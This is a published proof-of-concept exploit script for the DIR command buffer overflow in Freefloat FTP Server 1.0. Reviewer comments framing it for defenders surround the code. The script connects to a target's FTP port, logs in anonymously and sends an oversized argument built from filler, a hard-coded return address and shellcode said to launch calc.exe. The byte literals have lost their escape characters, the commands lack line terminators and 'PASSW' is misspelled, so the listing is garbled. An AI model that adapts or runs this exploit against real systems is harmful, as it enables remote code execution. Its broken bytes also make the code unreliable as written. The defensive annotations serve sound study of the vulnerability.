Freefloat FTP Server 1.0 DIR Buffer Overflow
Posted on 02 November 2016
# Published proof-of-concept for the overflow named in the page title (the DIR
# command of Freefloat FTP Server 1.0). The script uses Python 2 syntax
# (print statement, raw_input).
#
# Reading notes for defenders:
#   * The whole request is one FTP session on TCP port 21: a login exchange
#     followed by a single `dir` command carrying an oversized argument. An FTP
#     command line far longer than ordinary client traffic, with non-text
#     content in the argument, is the observable network event.
#   * The script logs in as `anonymous` first. Whether the command can be
#     reached without a login is not shown here.
#   * NOTE(review): as rendered on this page the string literals are plain ASCII
#     text rather than raw bytes. Treat the listing as documentation of the
#     request's structure, not as a source for byte-level signatures.
#   * Mitigation lies outside this script: remove or replace the affected
#     server, keep the FTP service off untrusted networks, and treat DEP/ASLR as
#     defence in depth only.
#     NOTE(review): I am not aware of a vendor fix for this product. Confirm.
import socket
# `sys` and `os` are imported but never used in this listing.
import sys
import os

# Author/credit banner printed at start-up. The text is kept exactly as it
# appears on the page.
print ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: ScrR1pTK1dd13.slammer@gmail.com # ############################################## # Exploit Title: FreefloatFTPserver1.0_dir_command_remotecode_exploit # Date: 2016.11.02 # Exploit Author: Greg Priest # Version: FreefloatFTPserver1.0 # Tested on: Windows7 x64 HUN/ENG Professional '''

# The target address is read interactively. The port is fixed to 21, the
# standard FTP control port.
ip = raw_input("Target ip: ")
port = 21

# Filler of 247 'A' characters placed in front of the value named `eip`.
# Presumably this is the distance to the saved return address in the build the
# author tested. Not verifiable from this listing.
overflow = 'A' * 247

# Hard-coded address constant followed by 10 padding elements. A fixed address
# ties the proof-of-concept to the module layout of the tested system (the
# banner names Windows7 x64), and address-space randomisation changes that
# layout.
eip = 'xF4xAFxEAx75' + 'x90' * 10

# Author's label for the payload below: launches calc.exe, a demonstration
# payload. The behaviour is taken from the author's comment and has not been
# verified from this listing.
shellcode =(
"x31xdbx64x8bx7bx30x8bx7f" +
"x0cx8bx7fx1cx8bx47x08x8b" +
"x77x20x8bx3fx80x7ex0cx33" +
"x75xf2x89xc7x03x78x3cx8b" +
"x57x78x01xc2x8bx7ax20x01" +
"xc7x89xddx8bx34xafx01xc6" +
"x45x81x3ex43x72x65x61x75" +
"xf2x81x7ex08x6fx63x65x73" +
"x75xe9x8bx7ax24x01xc7x66" +
"x8bx2cx6fx8bx7ax1cx01xc7" +
"x8bx7cxafxfcx01xc7x89xd9" +
"xb1xffx53xe2xfdx68x63x61" +
"x6cx63x89xe2x52x52x53x53" +
"x53x53x53x53x52x53xffxd7")

# The full command argument is filler, then the address constant with its
# padding, then the payload, then a terminator string.
remotecode = overflow + eip + shellcode + ' '

# Plain TCP connection to the FTP control port. No timeout is set, so every
# recv() below blocks until the server answers.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# socket.connect() returns None, so `connect` holds no useful value.
connect=s.connect((ip ,port))
# Each recv(1024) reads and discards one server reply. Replies are never
# inspected, so the script cannot tell whether a step was accepted.
s.recv(1024)
s.send('USER anonymous ')
s.recv(1024)
s.send('PASSW hacker@hacker.net ')
s.recv(1024)

# This message is printed before the oversized command is sent, so it is not
# evidence that anything happened on the server.
print ''' Successfull Exploitation! '''

# The single request that carries the oversized argument.
message = 'dir ' + remotecode
s.send(message)
s.recv(1024)
# NOTE(review): `s.close` is only referenced, not called, so the socket is not
# closed explicitly by this script.
s.close